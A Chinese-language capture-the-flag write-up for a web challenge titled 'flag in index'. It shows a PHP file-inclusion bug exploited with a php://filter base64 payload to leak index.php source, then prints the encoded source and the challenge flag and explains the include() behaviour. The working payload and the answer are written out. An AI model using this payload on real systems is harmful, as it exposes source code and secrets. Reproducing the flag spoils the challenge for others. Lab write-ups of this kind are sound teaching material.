WEB_flag在index里

，题目链接：http://123.206.87.240:8005/post/

题解：

打开题目

点击进去，除了一个test5后什么也没有，但是发现了URL中的地址后缀变化，是典型的文件包含漏洞，file关键字是提示，其实也是CTF的套路

题目标题就说明了，flag在index中，要用到PHP的封装协议，在文件后缀添加  ?file=PHP://filter/read=convert.base64-encode/resource=index.PHP

即

http://123.206.87.240:8005/post/index.PHP?file=PHP://filter/read=convert.base64-encode/resource=index.PHP

进去就能得到一串字符，==结尾，就是BASE64加密了

得到的字符串如下：

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydgluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

进行BASE64解密，在线解密链接：https://base64.supfree.net/

 得到PHP源代码，还包含了注释的flag

即flag为：flag{edulcni_elif_lacol_si_siht}

 

下面就本题关键的URL地址信息进行说明：

现在具体说说file=PHP://filter/read=convert.base64-encode/resource=index.PHP的含义：

首先这是一个file关键字的get参数传递，PHP://是一种协议名称，PHP://filter/是一种访问本地文件的协议，/read=convert.base64-encode/表示读取的方式是base64编码后，resource=index.PHP表示目标文件为index.PHP。

通过传递这个参数可以得到index.PHP的源码，下面说说为什么，看到源码中的include函数，这个表示从外部引入PHP文件并执行，如果执行不成功，就返回文件的源码。

而include的内容是由用户控制的，所以通过我们传递的file参数，是include（）函数引入了index.PHP的base64编码格式，因为是base64编码格式，所以执行不成功，返回源码，所以我们得到了源码的base64格式，解码即可。

如果不进行base64编码传入，就会直接执行，而flag的信息在注释中，是得不到的。

 

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 [email protected] 举报，一经查实，本站将立刻删除。